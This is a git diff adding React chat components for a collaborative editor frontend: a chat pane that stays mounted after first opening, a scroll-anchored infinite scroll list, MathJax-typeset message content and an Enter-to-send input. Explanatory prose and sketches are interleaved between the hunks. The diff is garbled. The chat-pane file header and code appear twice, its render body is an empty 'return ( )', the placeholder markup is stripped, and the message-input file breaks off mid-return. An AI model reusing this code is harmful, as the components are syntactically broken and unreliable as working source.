diff --git a/services/web/frontend/js/features/chat/components/chat-pane.tsx b/services/web/frontend/js/features/chat/components/chat-pane.tsx
new file mode 100644
index 0000000..d510377
--- /dev/null
+++ b/services/web/frontend/js/features/chat/components/chat-pane.tsx
@@ -0,0 +1,117 @@
+import React, { lazy, Suspense, useEffect, useState } from 'react'
+import { useTranslation } from 'react-i18next'
+
+import MessageInput from './message-input'
+import InfiniteScroll from './infinite-scroll'
+import ChatFallbackError from './chat-fallback-error'
+import { useLayoutContext } from '../../../shared/context/layout-context'
+import { useUserContext } from '../../../shared/context/user-context'
+import withErrorBoundary from '../../../infrastructure/error-boundary'
+import { FetchError } from '../../../infrastructure/fetch-json'
+import { useChatContext } from '../context/chat-context'
+import { FullSizeLoadingSpinner } from '../../../shared/components/loading-spinner'
+import MaterialIcon from '@/shared/components/material-icon'
+
+const MessageList = lazy(() => import('./message-list'))
+
+const Loading = () => <FullSizeLoadingSpinner />
+
+const ChatPane = React.memo(function ChatPane() {
+  const { t } = useTranslation()
+
+  const { chatIsOpen } = useLayoutContext()
+  const user = useUserContext()
+
+  const {
+    status,
+    messages,
+    initialMessagesLoaded,
+    atEnd,
+    loadInitialMessages,
+    loadMoreMessages,
+    reset,
+    sendMessage,
+    markMessagesAsRead,
+    error,
+  } = useChatContext()
+
+  useEffect(() => {
+    if (chatIsOpen && !initialMessagesLoaded) {
+      loadInitialMessages()
+    }
+  }, [chatIsOpen, loadInitialMessages, initialMessagesLoaded])
+
+  const shouldDisplayPlaceholder = status !== 'pending' && messages.length === 0
+
+  const messageContentCount = messages.reduce(
+    (acc, { contents }) => acc + contents.length,
+    0
+  )
+
+  // Keep the chat pane in the DOM to avoid resetting the form input and re-rendering MathJax content.
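+  // `chatOpenedOnce` latches to true the first time the pane is shown, so the
+  // subtree below stays mounted (merely hidden) on subsequent toggles.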
diff --git a/services/web/frontend/js/features/chat/components/chat-pane.tsx b/services/web/frontend/js/features/chat/components/chat-pane.tsx
new file mode 100644
index 0000000..d510377
--- /dev/null
+++ b/services/web/frontend/js/features/chat/components/chat-pane.tsx
@@ -0,0 +1,117 @@
+import React, { lazy, Suspense, useEffect, useState } from 'react'
+import { useTranslation } from 'react-i18next'
+
+import MessageInput from './message-input'
+import InfiniteScroll from './infinite-scroll'
+import ChatFallbackError from './chat-fallback-error'
+import { useLayoutContext } from '../../../shared/context/layout-context'
+import { useUserContext } from '../../../shared/context/user-context'
+import withErrorBoundary from '../../../infrastructure/error-boundary'
+import { FetchError } from '../../../infrastructure/fetch-json'
+import { useChatContext } from '../context/chat-context'
+import { FullSizeLoadingSpinner } from '../../../shared/components/loading-spinner'
+import MaterialIcon from '@/shared/components/material-icon'
+
+const MessageList = lazy(() => import('./message-list'))
+
+const Loading = () => <FullSizeLoadingSpinner />
+
+const ChatPane = React.memo(function ChatPane() {
+  const { t } = useTranslation()
+
+  const { chatIsOpen } = useLayoutContext()
+  const user = useUserContext()
+
+  const {
+    status,
+    messages,
+    initialMessagesLoaded,
+    atEnd,
+    loadInitialMessages,
+    loadMoreMessages,
+    reset,
+    sendMessage,
+    markMessagesAsRead,
+    error,
+  } = useChatContext()
+
+  useEffect(() => {
+    if (chatIsOpen && !initialMessagesLoaded) {
+      loadInitialMessages()
+    }
+  }, [chatIsOpen, loadInitialMessages, initialMessagesLoaded])
+
+  const shouldDisplayPlaceholder = status !== 'pending' && messages.length === 0
+
+  const messageContentCount = messages.reduce(
+    (acc, { contents }) => acc + contents.length,
+    0
+  )
+
+  // Keep the chat pane in the DOM to avoid resetting the form input and re-rendering MathJax content.
+  const [chatOpenedOnce, setChatOpenedOnce] = useState(chatIsOpen)
+  useEffect(() => {
+    if (chatIsOpen) {
+      setChatOpenedOnce(true)
+    }
+  }, [chatIsOpen])
+
+  if (error) {
+    // let the user try to recover from fetch errors
+    if (error instanceof FetchError) {
+      return <ChatFallbackError reconnect={reset} />
+    }
+    throw error
+  }
+
+  if (!user) {
+    return null
+  }
+  if (!chatOpenedOnce) {
+    return null
+  }
+
+  return (
+  )
+})
+
+function Placeholder() {
+  const { t } = useTranslation()
+  return (
+    <>
+      {t('no_messages')}
+
+      {t('send_first_message')}
+
+    </>
+  )
+}
+
+export default withErrorBoundary(ChatPane, ChatFallbackError)
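ChatPane renders nothing until the chat is first opened, then stays mounted and is merely hidden afterwards: chatOpenedOnce latches to true and is never reset, which preserves the draft in the message input and the MathJax-typeset messages across toggles. The latch on its own, as a sketch (the Panel component is illustrative):

import { useEffect, useState, type ReactNode } from 'react'

// Sketch: mount a heavy panel on first open, then hide rather than unmount.
function Panel({ isOpen, children }: { isOpen: boolean; children: ReactNode }) {
  const [openedOnce, setOpenedOnce] = useState(isOpen)

  useEffect(() => {
    if (isOpen) setOpenedOnce(true) // latches on; never set back to false
  }, [isOpen])

  if (!openedOnce) return null // cheap until the user first opens the panel
  return <div hidden={!isOpen}>{children}</div> // state survives re-hiding
}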
diff --git a/services/web/frontend/js/features/chat/components/infinite-scroll.tsx b/services/web/frontend/js/features/chat/components/infinite-scroll.tsx
new file mode 100644
index 0000000..9de0ed9
--- /dev/null
+++ b/services/web/frontend/js/features/chat/components/infinite-scroll.tsx
@@ -0,0 +1,95 @@
+import { useRef, useEffect, useLayoutEffect } from 'react'
+import _ from 'lodash'
+
+const SCROLL_END_OFFSET = 30
+
+interface InfiniteScrollProps {
+  atEnd?: boolean
+  children: React.ReactElement
+  className?: string
+  fetchData(): void
+  itemCount: number
+  isLoading?: boolean
+}
+
+function InfiniteScroll({
+  atEnd,
+  children,
+  className = '',
+  fetchData,
+  itemCount,
+  isLoading,
+}: InfiniteScrollProps) {
+  const root = useRef<HTMLDivElement>(null)
+
+  // we keep the value in a ref instead of state so it can be safely used in effects
+  const scrollBottomRef = useRef(0)
+  function setScrollBottom(value: number) {
+    scrollBottomRef.current = value
+  }
+
+  function updateScrollPosition() {
+    if (root.current) {
+      root.current.scrollTop =
+        root.current.scrollHeight -
+        root.current.clientHeight -
+        scrollBottomRef.current
+    }
+  }
+
+  // Repositions the scroll after new items are loaded
+  useLayoutEffect(updateScrollPosition, [itemCount])
+
+  // Repositions the scroll after a window resize
+  useEffect(() => {
+    const handleResize = _.debounce(updateScrollPosition, 400)
+    window.addEventListener('resize', handleResize)
+    return () => {
+      window.removeEventListener('resize', handleResize)
+    }
+  }, [])
+
+  function onScrollHandler(event: React.UIEvent) {
+    if (root.current) {
+      setScrollBottom(
+        root.current.scrollHeight -
+          root.current.scrollTop -
+          root.current.clientHeight
+      )
+
+      if (event.target !== event.currentTarget) {
+        // Ignore scroll events on nested divs
+        // (this check won't be necessary in React 17: https://github.com/facebook/react/issues/15723)
+        return
+      }
+      if (shouldFetchData()) {
+        fetchData()
+      }
+    }
+  }
+
+  function shouldFetchData() {
+    if (!root.current) {
+      return false
+    }
+    const containerIsLargerThanContent =
+      root.current.children[0].clientHeight < root.current.clientHeight
+    if (atEnd || isLoading || containerIsLargerThanContent) {
+      return false
+    } else {
+      return root.current.scrollTop < SCROLL_END_OFFSET
+    }
+  }
+
+  return (
+    <div ref={root} onScroll={onScrollHandler} className={className}>
+      {children}
+    </div>
+  )
+}
+
+export default InfiniteScroll
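InfiniteScroll keeps the view anchored to the bottom of the conversation: every scroll event records the distance from the bottom edge, and a layout effect restores that distance after itemCount changes, so prepending older messages does not make the visible messages jump. The arithmetic in isolation (helper names are illustrative):

// Sketch: capture and restore the distance from the bottom of a scroll container.
function captureScrollBottom(el: HTMLElement): number {
  // how far the viewport currently sits above the bottom of the content
  return el.scrollHeight - el.scrollTop - el.clientHeight
}

function restoreScrollBottom(el: HTMLElement, scrollBottom: number): void {
  // after content grows, recompute scrollTop so the same offset is kept
  el.scrollTop = el.scrollHeight - el.clientHeight - scrollBottom
}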
diff --git a/services/web/frontend/js/features/chat/components/message-content.tsx b/services/web/frontend/js/features/chat/components/message-content.tsx
new file mode 100644
index 0000000..ad2e6a6
--- /dev/null
+++ b/services/web/frontend/js/features/chat/components/message-content.tsx
@@ -0,0 +1,43 @@
+import { useRef, useEffect, type FC } from 'react'
+import Linkify from 'react-linkify'
+import useIsMounted from '../../../shared/hooks/use-is-mounted'
+import { loadMathJax } from '../../mathjax/load-mathjax'
+import { debugConsole } from '@/utils/debugging'
+
+const MessageContent: FC<{ content: string }> = ({ content }) => {
+  const root = useRef<HTMLDivElement>(null)
+  const mounted = useIsMounted()
+
+  useEffect(() => {
+    if (root.current) {
+      // adds attributes to all the links generated by <Linkify>, required due to
+      // https://github.com/tasti/react-linkify/issues/99
+      for (const a of root.current.getElementsByTagName('a')) {
+        a.setAttribute('target', '_blank')
+        a.setAttribute('rel', 'noreferrer noopener')
+      }
+
+      // MathJax v3 typesetting
+      loadMathJax()
+        .then(async MathJax => {
+          if (mounted.current) {
+            const element = root.current
+            try {
+              await MathJax.typesetPromise([element])
+              MathJax.typesetClear([element])
+            } catch (error) {
+              debugConsole.error(error)
+            }
+          }
+        })
+        .catch(debugConsole.error)
+    }
+  }, [content, mounted])
+
+  return (
+    <div ref={root}>
+      <Linkify>{content}</Linkify>
+    </div>
+  )
+}
+
+export default MessageContent
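The effect in MessageContent re-typesets a message whenever its content changes: it waits for MathJax to load, bails out if the component unmounted in the meantime, typesets just that one element, then calls typesetClear so MathJax forgets the node and can typeset it again later. The same sequence as a standalone sketch (reusing the loadMathJax import shown above; the isMounted callback is a stand-in for the useIsMounted hook):

import { loadMathJax } from '../../mathjax/load-mathjax'

// Sketch: typeset a single element with MathJax v3, tolerating unmounts and errors.
async function typesetElement(el: HTMLElement, isMounted: () => boolean) {
  const MathJax = await loadMathJax()
  if (!isMounted()) return // the node may be gone by the time MathJax is ready
  try {
    await MathJax.typesetPromise([el]) // render any TeX found inside the element
    MathJax.typesetClear([el]) // drop MathJax's bookkeeping so re-typesetting works
  } catch (err) {
    console.error(err) // a bad formula should not take down the chat pane
  }
}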

diff --git a/services/web/frontend/js/features/chat/components/message-input.tsx b/services/web/frontend/js/features/chat/components/message-input.tsx
new file mode 100644
index 0000000..b0c2312
--- /dev/null
+++ b/services/web/frontend/js/features/chat/components/message-input.tsx
@@ -0,0 +1,42 @@
+import { useTranslation } from 'react-i18next'
+
+type MessageInputProps = {
+  resetUnreadMessages: () => void
+  sendMessage: (message: string) => void
+}
+
+function MessageInput({ resetUnreadMessages, sendMessage }: MessageInputProps) {
+  const { t } = useTranslation()
+
+  function handleKeyDown(event: React.KeyboardEvent) {
+    const selectingCharacter = event.nativeEvent.isComposing
+    if (event.key === 'Enter' && !selectingCharacter) {
+      event.preventDefault()
+      const target = event.target as HTMLInputElement
+      sendMessage(target.value)
+      // wrap the form reset in setTimeout so input sources have time to finish
+      // https://github.com/overleaf/internal/pull/9206
+      window.setTimeout(() => {
+        target.blur()
+        target.closest('form')?.reset()
+        target.focus()
+      }, 0)
+    }
+  }
+
+  return (
    + +
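The keydown handler in message-input treats Enter as "send", but only when the native event's isComposing flag is clear, so users composing text through an IME (for example Chinese or Japanese input) can press Enter to confirm a candidate without sending the message. The same guard on a bare DOM listener (the selector is illustrative):

// Sketch: Enter sends, except while an IME composition session is in progress.
const input = document.querySelector<HTMLTextAreaElement>('textarea.chat-input')
input?.addEventListener('keydown', event => {
  if (event.key === 'Enter' && !event.isComposing) {
    event.preventDefault()
    console.log('send:', input.value) // stand-in for sendMessage(input.value)
  }
})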